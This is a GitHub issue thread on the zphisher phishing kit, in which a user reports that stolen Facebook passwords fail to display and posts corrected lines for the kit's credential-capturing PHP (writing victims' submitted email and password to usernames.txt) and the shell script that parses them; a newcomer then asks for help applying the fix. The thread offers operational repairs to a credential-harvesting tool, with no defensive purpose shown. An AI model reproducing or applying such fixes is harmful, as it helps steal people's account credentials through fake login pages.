### ISSUE TITLE
Graphical bug in zphisher.sh

### ISSUE THREAD

**Issue by Meht-evaS** [htr-tech/zphisher#457]
On line 360 ​​of zphisher.sh
`PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | cut -d ":" -f2)`
there is a bug that cannot get the password obtained in the shell to print. 
To see the password we need to change the line of code to:
`PASSWORD=$(grep -o 'Password:.*' .server/www/usernames.txt | cut -d " " -f2)`

-----------------------------------------------------------------------------------------------------------------------------
Edit:
This error appears only with Facebook login and not with other login, so your code in Zphisher.sh is correct but there is an error in Facebook files. In particular the error is at line 2 of .sites/facebook/login.php
`file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);`
To see the password we need to change the line of code to:
`file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);`

![Error](https://user-images.githubusercontent.com/57435273/157224260-451f7362-941a-4caf-a39f-75d6654a0299.png)

**Comment by abusamadres3** [comment]
Cómo hago eso?

**Comment by abusamadres3** [comment]
can you tell me how to do that please?

**Comment by Meht-evaS** [comment]
@abusamadres3 I write it in the description of the problem, under the section "Edit"

**Comment by abusamadres3** [comment]
I understood that you have to place that command, but how do I do it? I'm new, but this catches my attention and I would like to learn

**Comment by abusamadres3** [comment]
@Meht-evaS I understood that you have to place that command, but how do I do it? I am new, but this catches my attention and I would like to learn

**Comment by Meht-evaS** [comment]
@abusamadres3 You can download the source code and then modify it in local

**Comment by abusamadres3** [comment]
I already understand a little, could you tell me how I do it? 😅Couldn't I contact you directly for help?

**Comment by abusamadres3** [comment]
@Meht-evaS I already understand a little, could you tell me how I do it? 😅Couldn't I contact you directly for help?

**Comment by Meht-evaS** [comment]
@abusamadres3 Sorry but I'm not the best person to explain how GitHub works. It's better if you search it in Google or YouTube for learn the basics

**Comment by htr-tech** [comment]
[#460 ](https://github.com/htr-tech/zphisher/pull/460#issuecomment-1063212999)
